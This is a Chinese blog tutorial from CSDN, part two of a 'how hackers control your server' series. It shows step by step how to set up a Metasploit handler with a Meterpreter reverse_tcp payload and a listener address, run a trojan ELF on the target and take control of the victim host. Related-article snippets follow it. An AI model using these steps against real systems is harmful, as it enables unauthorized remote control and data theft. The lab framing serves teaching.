网络安全工程师演示:原来黑客是这样控制你的服务器的!(下)

最新推荐文章于 2021-12-17 19:19:57 发布
最新推荐文章于 2021-12-17 19:19:57 发布
阅读量280 收藏 2
点赞数
分类专栏: 黑客 IT技术 科技 文章标签: 网络 计算机网络 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiao1234oaix/article/details/109564643
版权
黑客 同时被 3 个专栏收录
192 篇文章 31 订阅
订阅专栏
科技
187 篇文章 10 订阅
订阅专栏
IT技术
173 篇文章 3 订阅
订阅专栏

课前声明:
1、本分享仅做学习交流,请自觉遵守法律法规!
2、搜索:Kali 与编程,学习更多网络攻防干货!
3、Kali 与编程每天准时更新,敬请学习和关注!
正文部分
一、背景介绍
Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用木马控制受害者主机呢?接下来让我们一起学习!
二、资源装备
1.安装好 Linux的虚拟机一台
2.整装待发的小白一个。
3.安装好的Kali Linux虚拟机一台。
三、战略安排
3.1 启动Metasploit(msf)渗透测试框架,如下图所示。
命令1:msfconsole
在这里插入图片描述

步骤1:利用相应的漏洞利用模块,如下图所示。
命令2:use exploit/multi/handler
在这里插入图片描述

步骤2:查看漏洞模块对应的参数,如下图所示。
命令3:show options
在这里插入图片描述

步骤3:设置对应的payload方便后续攻击,如下图所示。
命令:set payload linux/x86/meterpreter/reverse_tcp
在这里插入图片描述

步骤4:查看该漏洞模块的相关参数,如下图所示。
命令:show options
在这里插入图片描述

步骤5:设置对应的参数,如下图所示。
命令:set lhost 193.168.78.169
在这里插入图片描述

步骤6:查看配置的参数是否成功,如下图所示。
命令:show options
在这里插入图片描述

3.2 运行木马文件,如下图所示。
步骤1:给木马文件赋予执行权限,如下图所示。
命令:chmod +x hack.elf
在这里插入图片描述

步骤2:执行木马文件,如下图所示。
命令:./hack.elf
在这里插入图片描述

3.3 运行漏洞利用模块,如下图所示。
命令:run
如下图所示,成功拿下目标主机。
在这里插入图片描述

查看目标主机的文件系统信息,如下图所示。
在这里插入图片描述
小编一个个字敲打创作,可辛苦了,问君可否关注一下我呢?你还可搜索:Kali与编程,学习更多黑客渗透技巧呢 !拒绝盗版,转载请声明来源:Kali与编程
点我学习完整视频渗透课,预计更新1000节

Kali与编程~
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
木马客户端与服务端隐蔽通讯解析
软体疯子专栏
02-02 2201
现代木马的实现是建立在一种既可靠,又不易被宿主发现的通讯方案上的,本文就是对各种方案的实现方法,可靠性,安全性做了一些理论上的探讨。充分的理解木马的客户端和服务端是怎么进行隐藏的,不但可以帮助您能深刻的理解网络通信的原理,也可以更有效的做好安全防范。基于此我们编发了此文,下面我们进入正题。 首先应该明确的是受害者的机器上运行的木马程序我们称之为服务端,控制者机器上运行的我们称之为客户端(其实对
2022年网络安全工程师考试学习资料.doc
最新发布
11-20
"2022年网络安全工程师考试学习资料.doc" 本学习资料旨在帮助考生掌握网络安全工程师考试所需的知识点。以下是对标题、描述、标签和部分内容的解释和知识点总结: 1. 安全风险描述:安全风险是指一种特定脆弱性被...
网络安全工程师演示原来黑客是这样控制你的服务器的!(上)
Kali与编程
11-07 242
课前声明: 1、本分享仅做学习交流,请自觉遵守法律法规! 2、搜索:Kali 与编程,学习更多网络攻防干货! 3、Kali 与编程每天准时更新,敬请学习和关注! 正文部分 一、背景介绍 Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用木马控制受害者
网络安全与网站安全及计算机安全:如何使用Kali Linux获取WEB网站服务器操作权限的【中】
Kali与编程
12-17 3708
一、背景介绍 Metasploit就是一个网络安全框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用木码控制受害者主机呢?接下来让我们一起学习!​ 二、资源装备 1.安装好的Linux虚拟机一台 2.整装待发的小白一个。 3.安装好的Kali Linux虚拟机一台。 三、安全演练 3.
华为服务器可以屏蔽娱乐网站吗,网络安全工程师演示原来***是这样控制你的网站服务器的!...
weixin_32009069的博客
08-03 187
课前声明:1、本分享仅做学习交流,请自觉遵守法律法规!2、搜索:Kali 与编程,学习更多网络***干货!3、Kali 与编程每天准时更新,敬请学习和关注!正文部分一、背景介绍Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者...
浅析木马服务端的生成技术
Junelf's BLOG
03-30 1175
作者:李马 有些木马在解压缩之后只会有一个客户端程序,用户可以通过在客户端的一些设置工作来自动生成针对性比较强的服务端程序,例如特定的端口、击键木马的邮件地址、密码、SMTP服务器等等。在本文中,我将简要地探讨这一技术的实现。从“生成”的这个事实来看,我们可以猜想客户端程序可能本身绑有一段自定义的二进制数据,这段二进制数据实质上就是一个服务端的模板。在用户进行了设置工作之后,客户端
alfarroba::memo:完整的黑客马拉松工具! 当前状态
05-02
Alfarroba是一种黑客马拉松管理系统,旨在集成大多数黑客马拉松操作,无论是在管理员端还是在参与者端。 它在管理员端充当事件管理工具,在参与者端充当工作工具。 它基于HackMIT的注册系统Quill专门为黑客马拉松而...
slackathon:悠闲的黑客马拉松就在这里!
04-07
CakePHP应用程序框架 使用 4.x创建应用程序的框架。 框架源代码可以在这里... 现在,您可以使用计算机的Web服务器查看默认主页,也可以使用以下命令启动内置Web服务器: bin/cake server -p 8765 然后访问http://
[网络安全:《黑客帝国》]-黑客帝国3.docx
11-15
综上所述,网络安全在《黑客帝国》的启示下,从网络虚拟化、无线网络与BYOD安全,到法律法规的制定和隐私保护,都面临着不断升级的挑战和机遇。企业和个人都需要更加重视网络安全,不断提升防护能力和意识,以应对这...
学习网络黑客网络黑客学习笔记网络安全学习笔记
02-05
比较直白的一个定义是,Web安全是包括网站,网络应用,网络服务内部的多种安全内容,或者说,Web安全关注的是应用层的安全,尤其是细化到与网络相关内容的安全。如此,Web安全需要学习的内容主要包括网络协议本身,...
网络安全从入门到精通(第十章-3)利用工具快速拿下服务器(KaLi-MSF)
划水的小白白
02-23 571
本文内容: ~认识MSF和永恒之蓝 ~MSF的基础命令 ~漏洞利用基本流程 ~实战漏洞利用 额外说明: 这篇文章,仅仅作为扩展,大家了解一下MSF(美少妇) 一、认识MSF和永恒之蓝 1,定义 Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、 开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的 专业级漏洞攻击工具 ...
游戏服务器被攻击怎么办?高防服务器租用103.88.35.1
驰网云儿
09-27 710
游戏服务器不管是个人的还是企业的,被攻击都是很常见的,在所难免的,特别是游戏新上线时,都要承受的住那些外来压力,玩家突然猛增,被攻击等等,如果承受不住可能会直接宣布游戏倒闭,这里我们一起来说说游戏服务器为什么老被攻击的一些原因和处理方法一、竞争对手来攻击你的服务器,让你的服务器无法正常运行,游戏很卡或被攻击到所有服务器瘫痪,玩家就会去竞争对手那里玩二、游戏里的一些玩家,对游戏里的部分人,例如GM不满意,然后攻击服务器,发泄三、一些伪黑客爱好者或初学者,拿服务器试试手,看看自己的技术怎么样那常见攻击方式有哪些
Kali渗透测试------信息收集-------识别服务,操作系统
Z_Grant的博客
08-14 573
文章目录一,识别操作系统1.nmap1.1 -O1.1 -osscan-guesss 猜测模式2. Xprobe23. p0f (被动扫描)二,识别服务1.
Kali Linux进行简单的网页嗅探
aedvance的博客
06-29 1万+
使用Kali Linux进行局域网的嗅探操作
kali 主动信息收集之主机发现
qq_45070118的博客
06-23 1803
主动信息收集,简单地说,就是直接和目标主机进行通信,进而来查看相应的信息。其缺点是很明显的,就是它容易被发现,主动发起的直接请求会被目标主机记录下来,即会留下访问的痕迹,最好使用受控的第三方主机进行探测,如使用代理或者是已经被控制的主机。 分为二层发现三层发现四层发现 二层发现 arping arping命令是用于发送arp请求到一个相邻主机的工具,arping使用arp数据包,通过ping命令检...
木马病毒控制,服务端的木马程序,竟然可以自我修护!
weixin_44935794的博客
11-24 764
目录 木马病毒控制 服务端的木马程序 木马病毒通常是基于计算机网络的,是基于客户端和服务端的通信、监控程序。使用客户端程序远程 木马病毒控制 木马病毒控制,可以发出控制命令,接收服务端传来的信息。服务端程序运行在被控计算机上,一般隐藏在被控计算机中,可以接收客户端发来的命令并执行,将客户端需要的信息发回,也就是常说的木马程序。 木马病毒可以发作的必要条件是客户端和服务端必须建立起网络通信,这种通信是基于IP地址和端口号的。藏匿在服务端的木马程序一旦...
kali拿网站服务器,Kali攻破网站和服务器
weixin_29340327的博客
08-10 8817
Kali攻破网站和服务器发布时间:2018-08-04 16:09,浏览次数:877, 标签:Kali通过阅读这篇博客之后,你可以学习到一下几个关于渗透测试的知识点:1、渗透测试前的信息采集2、sqlmap的使用3、nmap,nikto(网页服务器扫描器),w3af(Web应用扫描器)的使用4、nc反弹提权5、linux系统的权限提升现在我们以hack-test.com作为要入侵的网站。第一步:...
服务器 系统 权限设置方法,WEB服务器系统盘权限简单设置
weixin_39693950的博客
08-05 540
不多说了我给大家写从新加权限的步骤,加上某用户或用户组时候会自动加上,读取及运行 列出文件目录读取,这三个权限加上administrator(组或用户)和SYSTEM所有权限 这些以后就不重复了.好了现在开始吧!先把C盘加上administrator(组或用户)和SYSTEM所有权限然后重值子目录权限叫所以子目录和子文件继承C盘的administrator(组或用户)和SYSTEM所有权限的两个权...
实战!入侵隔壁家WiFi与获取路由器管理权!
热门推荐
sumkee911‘s coding
11-14 6万+
大家好,今天是网络安全的话题,内容很入门,高手可以直接跳过。 本文章只供大家学习之用,请不要以身试法,否则后果自负。   1.获取WiFi密码 首先我们要获取WiFi密码,需要用到一张无线网卡(本人用RT3070)、Aircrack-ng工具、密码字典。 Aircrack-ng下载地址:http://www.aircrack-ng.org/ 密码字典下载地址:链接: https://p...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Kali与编程~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值